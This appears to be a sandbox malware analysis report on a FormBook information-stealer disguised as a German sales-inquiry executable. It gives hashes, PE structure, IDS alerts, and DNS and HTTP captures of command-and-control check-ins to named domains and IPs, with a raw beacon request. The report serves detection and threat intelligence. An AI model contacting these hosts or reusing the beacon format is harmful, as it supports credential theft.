                                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                            • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                                            • DOS Executable Generic (2002/1) 0.01%
                                                                            File name:Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exe
                                                                            File size:612864
                                                                            MD5:1c9b3c703779b11b16de35b52e2fd3d2
                                                                            SHA1:fd6a6cf3ed9e7b3fb5c722eb8c8be49c4e06c7e9
                                                                            SHA256:884509a71f4c0a818866f49982a2f4a1146063f65cb05f4202bdf3eb422575b0
                                                                            SHA512:564bb80bd08aeb57c0cf9e17002179524343fe18d94be58b6d3ef42dadcf9d098ca172cba94fd8aea38d96d03d22490caec7c1b06516a826278c688efa86aa61
                                                                            SSDEEP:12288:F5TE0ZQpxFe77KIoVXcA5h1kKZCeN34rGiTUMyoJNvuV:bTEJFePKIoVMA5MKZCnNmV
                                                                            TLSH:A3D4DF0FFFF569DBDC190FB8367188B66F21AB0664B8999922C4623538713138917D8B
                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...7EY...............0.................. ........@.. ....................................@................................
                                                                            Icon Hash:c4d66d6d6d676d84
                                                                            Entrypoint:0x47c00e
                                                                            Entrypoint Section:.text
                                                                            Digitally signed:false
                                                                            Imagebase:0x400000
                                                                            Subsystem:windows gui
                                                                            Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                            DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                            Time Stamp:0x90594537 [Fri Sep 28 17:45:27 2046 UTC]
                                                                            TLS Callbacks:
                                                                            CLR (.Net) Version:v4.0.30319
                                                                            OS Version Major:4
                                                                            OS Version Minor:0
                                                                            File Version Major:4
                                                                            File Version Minor:0
                                                                            Subsystem Version Major:4
                                                                            Subsystem Version Minor:0
                                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                            Instruction
                                                                            jmp dword ptr [00402000h]
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x7bfbc0x4f.text
                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x7e0000x1b270.rsrc
                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x9a0000xc.reloc
                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x7bfa00x1c.text
                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                            .text0x20000x7a0140x7a200False0.903157385491data7.84137262917IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                            .rsrc0x7e0000x1b2700x1b400False0.175172018349data3.78130433266IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                            .reloc0x9a0000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                            NameRVASizeTypeLanguageCountry
                                                                            RT_ICON0x7e2200x468GLS_BINARY_LSB_FIRST
                                                                            RT_ICON0x7e6880x2560PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                                            RT_ICON0x80be80x25a8dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 0, next used block 0
                                                                            RT_ICON0x831900x10a8dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 4282598464, next used block 3779150399
                                                                            RT_ICON0x842380x10828dBase III DBT, version number 0, next free block index 40
                                                                            RT_ICON0x94a600x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 0, next used block 0
                                                                            RT_GROUP_ICON0x98c880x5adata
                                                                            RT_VERSION0x98ce40x3a0data
                                                                            RT_MANIFEST0x990840x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                            DLLImport
                                                                            mscoree.dll_CorExeMain
                                                                            DescriptionData
                                                                            Translation0x0000 0x04b0
                                                                            LegalCopyrightCopyright 2022 Portland IC
                                                                            Assembly Version1.0.0.0
                                                                            InternalNameDateTimeConstantAttrib.exe
                                                                            FileVersion1.0.0.0
                                                                            CompanyNamePortland IC
                                                                            LegalTrademarks
                                                                            Comments
                                                                            ProductNameCustomer Services
                                                                            ProductVersion1.0.0.0
                                                                            FileDescriptionCustomer Services
                                                                            OriginalFilenameDateTimeConstantAttrib.exe
                                                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                            04/09/22-09:13:28.877144TCP2031453ET TROJAN FormBook CnC Checkin (GET)4978980192.168.2.3104.19.178.121
                                                                            04/09/22-09:13:28.877144TCP2031449ET TROJAN FormBook CnC Checkin (GET)4978980192.168.2.3104.19.178.121
                                                                            04/09/22-09:13:28.877144TCP2031412ET TROJAN FormBook CnC Checkin (GET)4978980192.168.2.3104.19.178.121
                                                                            04/09/22-09:13:39.103868TCP2031453ET TROJAN FormBook CnC Checkin (GET)4979180192.168.2.3185.76.64.173
                                                                            04/09/22-09:13:39.103868TCP2031449ET TROJAN FormBook CnC Checkin (GET)4979180192.168.2.3185.76.64.173
                                                                            04/09/22-09:13:39.103868TCP2031412ET TROJAN FormBook CnC Checkin (GET)4979180192.168.2.3185.76.64.173
                                                                            04/09/22-09:13:39.151034TCP1201ATTACK-RESPONSES 403 Forbidden8049791185.76.64.173192.168.2.3
                                                                            04/09/22-09:13:49.792502TCP2031453ET TROJAN FormBook CnC Checkin (GET)4979580192.168.2.354.161.222.85
                                                                            04/09/22-09:13:49.792502TCP2031449ET TROJAN FormBook CnC Checkin (GET)4979580192.168.2.354.161.222.85
                                                                            04/09/22-09:13:49.792502TCP2031412ET TROJAN FormBook CnC Checkin (GET)4979580192.168.2.354.161.222.85
                                                                            • Total Packets: 39
                                                                            • 80 (HTTP)
                                                                            • 53 (DNS)
                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Apr 9, 2022 09:13:01.840286016 CEST4975180192.168.2.3216.250.121.17
                                                                            Apr 9, 2022 09:13:01.978945971 CEST8049751216.250.121.17192.168.2.3
                                                                            Apr 9, 2022 09:13:01.979074955 CEST4975180192.168.2.3216.250.121.17
                                                                            Apr 9, 2022 09:13:01.979209900 CEST4975180192.168.2.3216.250.121.17
                                                                            Apr 9, 2022 09:13:02.117846966 CEST8049751216.250.121.17192.168.2.3
                                                                            Apr 9, 2022 09:13:02.129740953 CEST8049751216.250.121.17192.168.2.3
                                                                            Apr 9, 2022 09:13:02.129770041 CEST8049751216.250.121.17192.168.2.3
                                                                            Apr 9, 2022 09:13:02.129781961 CEST8049751216.250.121.17192.168.2.3
                                                                            Apr 9, 2022 09:13:02.129966021 CEST4975180192.168.2.3216.250.121.17
                                                                            Apr 9, 2022 09:13:02.130053043 CEST4975180192.168.2.3216.250.121.17
                                                                            Apr 9, 2022 09:13:02.268544912 CEST8049751216.250.121.17192.168.2.3
                                                                            Apr 9, 2022 09:13:07.198990107 CEST4977780192.168.2.3198.54.117.212
                                                                            Apr 9, 2022 09:13:07.365462065 CEST8049777198.54.117.212192.168.2.3
                                                                            Apr 9, 2022 09:13:07.365665913 CEST4977780192.168.2.3198.54.117.212
                                                                            Apr 9, 2022 09:13:07.740291119 CEST4977780192.168.2.3198.54.117.212
                                                                            Apr 9, 2022 09:13:07.906819105 CEST8049777198.54.117.212192.168.2.3
                                                                            Apr 9, 2022 09:13:07.906850100 CEST8049777198.54.117.212192.168.2.3
                                                                            Apr 9, 2022 09:13:18.052717924 CEST4978780192.168.2.3185.111.89.175
                                                                            Apr 9, 2022 09:13:18.079778910 CEST8049787185.111.89.175192.168.2.3
                                                                            Apr 9, 2022 09:13:18.079935074 CEST4978780192.168.2.3185.111.89.175
                                                                            Apr 9, 2022 09:13:18.080081940 CEST4978780192.168.2.3185.111.89.175
                                                                            Apr 9, 2022 09:13:18.107197046 CEST8049787185.111.89.175192.168.2.3
                                                                            Apr 9, 2022 09:13:18.566028118 CEST4978780192.168.2.3185.111.89.175
                                                                            Apr 9, 2022 09:13:18.623420000 CEST8049787185.111.89.175192.168.2.3
                                                                            Apr 9, 2022 09:13:18.623472929 CEST8049787185.111.89.175192.168.2.3
                                                                            Apr 9, 2022 09:13:18.623583078 CEST4978780192.168.2.3185.111.89.175
                                                                            Apr 9, 2022 09:13:18.623640060 CEST4978780192.168.2.3185.111.89.175
                                                                            Apr 9, 2022 09:13:28.859478951 CEST4978980192.168.2.3104.19.178.121
                                                                            Apr 9, 2022 09:13:28.876898050 CEST8049789104.19.178.121192.168.2.3
                                                                            Apr 9, 2022 09:13:28.877037048 CEST4978980192.168.2.3104.19.178.121
                                                                            Apr 9, 2022 09:13:28.877144098 CEST4978980192.168.2.3104.19.178.121
                                                                            Apr 9, 2022 09:13:28.894679070 CEST8049789104.19.178.121192.168.2.3
                                                                            Apr 9, 2022 09:13:28.903852940 CEST8049789104.19.178.121192.168.2.3
                                                                            Apr 9, 2022 09:13:28.903907061 CEST8049789104.19.178.121192.168.2.3
                                                                            Apr 9, 2022 09:13:28.904025078 CEST4978980192.168.2.3104.19.178.121
                                                                            Apr 9, 2022 09:13:28.904083967 CEST4978980192.168.2.3104.19.178.121
                                                                            Apr 9, 2022 09:13:28.921462059 CEST8049789104.19.178.121192.168.2.3
                                                                            Apr 9, 2022 09:13:39.061254978 CEST4979180192.168.2.3185.76.64.173
                                                                            Apr 9, 2022 09:13:39.099073887 CEST8049791185.76.64.173192.168.2.3
                                                                            Apr 9, 2022 09:13:39.101466894 CEST4979180192.168.2.3185.76.64.173
                                                                            Apr 9, 2022 09:13:39.103868008 CEST4979180192.168.2.3185.76.64.173
                                                                            Apr 9, 2022 09:13:39.141683102 CEST8049791185.76.64.173192.168.2.3
                                                                            Apr 9, 2022 09:13:39.151034117 CEST8049791185.76.64.173192.168.2.3
                                                                            Apr 9, 2022 09:13:39.151081085 CEST8049791185.76.64.173192.168.2.3
                                                                            Apr 9, 2022 09:13:39.151113033 CEST8049791185.76.64.173192.168.2.3
                                                                            Apr 9, 2022 09:13:39.151144028 CEST8049791185.76.64.173192.168.2.3
                                                                            Apr 9, 2022 09:13:39.151175976 CEST8049791185.76.64.173192.168.2.3
                                                                            Apr 9, 2022 09:13:39.151205063 CEST8049791185.76.64.173192.168.2.3
                                                                            Apr 9, 2022 09:13:39.151226997 CEST8049791185.76.64.173192.168.2.3
                                                                            Apr 9, 2022 09:13:39.151248932 CEST4979180192.168.2.3185.76.64.173
                                                                            Apr 9, 2022 09:13:39.151258945 CEST8049791185.76.64.173192.168.2.3
                                                                            Apr 9, 2022 09:13:39.151290894 CEST8049791185.76.64.173192.168.2.3
                                                                            Apr 9, 2022 09:13:39.151299953 CEST4979180192.168.2.3185.76.64.173
                                                                            Apr 9, 2022 09:13:39.151319981 CEST8049791185.76.64.173192.168.2.3
                                                                            Apr 9, 2022 09:13:39.151402950 CEST4979180192.168.2.3185.76.64.173
                                                                            Apr 9, 2022 09:13:39.151432991 CEST4979180192.168.2.3185.76.64.173
                                                                            Apr 9, 2022 09:13:39.151565075 CEST4979180192.168.2.3185.76.64.173
                                                                            Apr 9, 2022 09:13:39.189167976 CEST8049791185.76.64.173192.168.2.3
                                                                            Apr 9, 2022 09:13:39.189198017 CEST8049791185.76.64.173192.168.2.3
                                                                            Apr 9, 2022 09:13:39.189256907 CEST4979180192.168.2.3185.76.64.173
                                                                            Apr 9, 2022 09:13:39.189306021 CEST4979180192.168.2.3185.76.64.173
                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Apr 9, 2022 09:13:01.805658102 CEST6386153192.168.2.38.8.8.8
                                                                            Apr 9, 2022 09:13:01.831933022 CEST53638618.8.8.8192.168.2.3
                                                                            Apr 9, 2022 09:13:07.173897028 CEST6494153192.168.2.38.8.8.8
                                                                            Apr 9, 2022 09:13:07.197932959 CEST53649418.8.8.8192.168.2.3
                                                                            Apr 9, 2022 09:13:12.929478884 CEST6462453192.168.2.38.8.8.8
                                                                            Apr 9, 2022 09:13:12.979573965 CEST53646248.8.8.8192.168.2.3
                                                                            Apr 9, 2022 09:13:18.013439894 CEST6441253192.168.2.38.8.8.8
                                                                            Apr 9, 2022 09:13:18.051716089 CEST53644128.8.8.8192.168.2.3
                                                                            Apr 9, 2022 09:13:23.586203098 CEST5177953192.168.2.38.8.8.8
                                                                            Apr 9, 2022 09:13:23.705672979 CEST53517798.8.8.8192.168.2.3
                                                                            Apr 9, 2022 09:13:28.711019039 CEST5060853192.168.2.38.8.8.8
                                                                            Apr 9, 2022 09:13:28.858422995 CEST53506088.8.8.8192.168.2.3
                                                                            Apr 9, 2022 09:13:33.947786093 CEST5420553192.168.2.38.8.8.8
                                                                            Apr 9, 2022 09:13:33.988740921 CEST53542058.8.8.8192.168.2.3
                                                                            Apr 9, 2022 09:13:39.009044886 CEST5849753192.168.2.38.8.8.8
                                                                            Apr 9, 2022 09:13:39.059343100 CEST53584978.8.8.8192.168.2.3
                                                                            Apr 9, 2022 09:13:44.163099051 CEST5352453192.168.2.38.8.8.8
                                                                            Apr 9, 2022 09:13:44.283148050 CEST53535248.8.8.8192.168.2.3
                                                                            Apr 9, 2022 09:13:49.538419962 CEST5856153192.168.2.38.8.8.8
                                                                            Apr 9, 2022 09:13:49.652780056 CEST53585618.8.8.8192.168.2.3
                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                            Apr 9, 2022 09:13:01.805658102 CEST192.168.2.38.8.8.80xb12bStandard query (0)www.tunnelvisionconference.comA (IP address)IN (0x0001)
                                                                            Apr 9, 2022 09:13:07.173897028 CEST192.168.2.38.8.8.80x7378Standard query (0)www.terrierslovjt.xyzA (IP address)IN (0x0001)
                                                                            Apr 9, 2022 09:13:12.929478884 CEST192.168.2.38.8.8.80x6003Standard query (0)www.tra4fficsearchtabspace.restA (IP address)IN (0x0001)
                                                                            Apr 9, 2022 09:13:18.013439894 CEST192.168.2.38.8.8.80x6b4cStandard query (0)www.10thring.comA (IP address)IN (0x0001)
                                                                            Apr 9, 2022 09:13:23.586203098 CEST192.168.2.38.8.8.80xb561Standard query (0)www.schonheitschirurg.onlineA (IP address)IN (0x0001)
                                                                            Apr 9, 2022 09:13:28.711019039 CEST192.168.2.38.8.8.80x7fa8Standard query (0)www.youcanstores.comA (IP address)IN (0x0001)
                                                                            Apr 9, 2022 09:13:33.947786093 CEST192.168.2.38.8.8.80xfb32Standard query (0)www.hautebazaar.netA (IP address)IN (0x0001)
                                                                            Apr 9, 2022 09:13:39.009044886 CEST192.168.2.38.8.8.80x5a88Standard query (0)www.williamhag.onlineA (IP address)IN (0x0001)
                                                                            Apr 9, 2022 09:13:44.163099051 CEST192.168.2.38.8.8.80x215dStandard query (0)www.nevalostrecords.comA (IP address)IN (0x0001)
                                                                            Apr 9, 2022 09:13:49.538419962 CEST192.168.2.38.8.8.80x29baStandard query (0)www.tsctribe.comA (IP address)IN (0x0001)
                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                            Apr 9, 2022 09:13:01.831933022 CEST8.8.8.8192.168.2.30xb12bNo error (0)www.tunnelvisionconference.com216.250.121.17A (IP address)IN (0x0001)
                                                                            Apr 9, 2022 09:13:07.197932959 CEST8.8.8.8192.168.2.30x7378No error (0)www.terrierslovjt.xyzparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)
                                                                            Apr 9, 2022 09:13:07.197932959 CEST8.8.8.8192.168.2.30x7378No error (0)parkingpage.namecheap.com198.54.117.212A (IP address)IN (0x0001)
                                                                            Apr 9, 2022 09:13:07.197932959 CEST8.8.8.8192.168.2.30x7378No error (0)parkingpage.namecheap.com198.54.117.218A (IP address)IN (0x0001)
                                                                            Apr 9, 2022 09:13:07.197932959 CEST8.8.8.8192.168.2.30x7378No error (0)parkingpage.namecheap.com198.54.117.216A (IP address)IN (0x0001)
                                                                            Apr 9, 2022 09:13:07.197932959 CEST8.8.8.8192.168.2.30x7378No error (0)parkingpage.namecheap.com198.54.117.217A (IP address)IN (0x0001)
                                                                            Apr 9, 2022 09:13:07.197932959 CEST8.8.8.8192.168.2.30x7378No error (0)parkingpage.namecheap.com198.54.117.215A (IP address)IN (0x0001)
                                                                            Apr 9, 2022 09:13:07.197932959 CEST8.8.8.8192.168.2.30x7378No error (0)parkingpage.namecheap.com198.54.117.211A (IP address)IN (0x0001)
                                                                            Apr 9, 2022 09:13:07.197932959 CEST8.8.8.8192.168.2.30x7378No error (0)parkingpage.namecheap.com198.54.117.210A (IP address)IN (0x0001)
                                                                            Apr 9, 2022 09:13:12.979573965 CEST8.8.8.8192.168.2.30x6003Server failure (2)www.tra4fficsearchtabspace.restnonenoneA (IP address)IN (0x0001)
                                                                            Apr 9, 2022 09:13:18.051716089 CEST8.8.8.8192.168.2.30x6b4cNo error (0)www.10thring.com10thring.comCNAME (Canonical name)IN (0x0001)
                                                                            Apr 9, 2022 09:13:18.051716089 CEST8.8.8.8192.168.2.30x6b4cNo error (0)10thring.com185.111.89.175A (IP address)IN (0x0001)
                                                                            Apr 9, 2022 09:13:23.705672979 CEST8.8.8.8192.168.2.30xb561Server failure (2)www.schonheitschirurg.onlinenonenoneA (IP address)IN (0x0001)
                                                                            Apr 9, 2022 09:13:28.858422995 CEST8.8.8.8192.168.2.30x7fa8No error (0)www.youcanstores.comyoucanstores.comCNAME (Canonical name)IN (0x0001)
                                                                            Apr 9, 2022 09:13:28.858422995 CEST8.8.8.8192.168.2.30x7fa8No error (0)youcanstores.com104.19.178.121A (IP address)IN (0x0001)
                                                                            Apr 9, 2022 09:13:28.858422995 CEST8.8.8.8192.168.2.30x7fa8No error (0)youcanstores.com104.19.177.121A (IP address)IN (0x0001)
                                                                            Apr 9, 2022 09:13:33.988740921 CEST8.8.8.8192.168.2.30xfb32Name error (3)www.hautebazaar.netnonenoneA (IP address)IN (0x0001)
                                                                            Apr 9, 2022 09:13:39.059343100 CEST8.8.8.8192.168.2.30x5a88No error (0)www.williamhag.onlinewilliamhag.onlineCNAME (Canonical name)IN (0x0001)
                                                                            Apr 9, 2022 09:13:39.059343100 CEST8.8.8.8192.168.2.30x5a88No error (0)williamhag.online185.76.64.173A (IP address)IN (0x0001)
                                                                            Apr 9, 2022 09:13:44.283148050 CEST8.8.8.8192.168.2.30x215dNo error (0)www.nevalostrecords.com66.96.162.137A (IP address)IN (0x0001)
                                                                            Apr 9, 2022 09:13:49.652780056 CEST8.8.8.8192.168.2.30x29baNo error (0)www.tsctribe.comtraff-5.hugedomains.comCNAME (Canonical name)IN (0x0001)
                                                                            Apr 9, 2022 09:13:49.652780056 CEST8.8.8.8192.168.2.30x29baNo error (0)traff-5.hugedomains.comhdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                                                            Apr 9, 2022 09:13:49.652780056 CEST8.8.8.8192.168.2.30x29baNo error (0)hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com54.161.222.85A (IP address)IN (0x0001)
                                                                            Apr 9, 2022 09:13:49.652780056 CEST8.8.8.8192.168.2.30x29baNo error (0)hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com34.205.242.146A (IP address)IN (0x0001)
                                                                            • www.tunnelvisionconference.com
                                                                            • www.terrierslovjt.xyz
                                                                            • www.10thring.com
                                                                            • www.youcanstores.com
                                                                            • www.williamhag.online
                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                            0192.168.2.349751216.250.121.1780C:\Windows\explorer.exe
                                                                            TimestampkBytes transferredDirectionData
                                                                            Apr 9, 2022 09:13:01.979209900 CEST1425OUTGET /g6k0/?vDKd7h=9rjLcdHx-0r&oT=00OPvUDJVYQxzP7YGwKxSk8Z59zdNvCY+dfImaOG8hbO22YMZXpup+qu2+4V2Jgm5VQN HTTP/1.1
                                                                            Host: www.tunnelvisionconference.com
                                                                            Connection: close
                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            Apr 9, 2022 09:13:02.129740953 CEST1432INHTTP/1.1 404 Not Found
                                                                            Content-Type: text/html
                                                                            Content-Length: 1271
                                                                            Connection: close
                                                                            Date: Sat, 09 Apr 2022 07:13:02 GMT
                                                                            Server: Apache
                                                                            X-Frame-Options: deny
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 2c 20 23 70 61 72 74 6e 65 72 2c 20 69 66 72 61 6d 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 75 74 6c 69 6e 65 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 57 22 20 6e 61 6d 65 3d 22 65 78 70 69 72 65 73 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 47 4f 4f 47 4c 45 42 4f 54 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 3e 0a 20 20 3c 21 2d 2d 20 46 6f 6c 6c 6f 77 69 6e 67 20 4d 65 74 61 2d 54 61 67 20 66 69 78 65 73 20 73 63 61 6c 69 6e 67 2d 69 73 73 75 65 73 20 6f 6e 20 6d 6f 62 69 6c 65 20 64 65 76 69 63 65 73 20 2d 2d 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 3b 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 3b 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 70 61 72 74 6e 65 72 22 3e 0a 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 27 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 27 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 27 73 72 63 3d 22 2f 2f 73 65 64 6f 70 61 72 6b 69 6e 67 2e 63 6f 6d 2f 66 72 6d 70 61 72 6b 2f 27 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 20 2b 20 27 2f 27 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 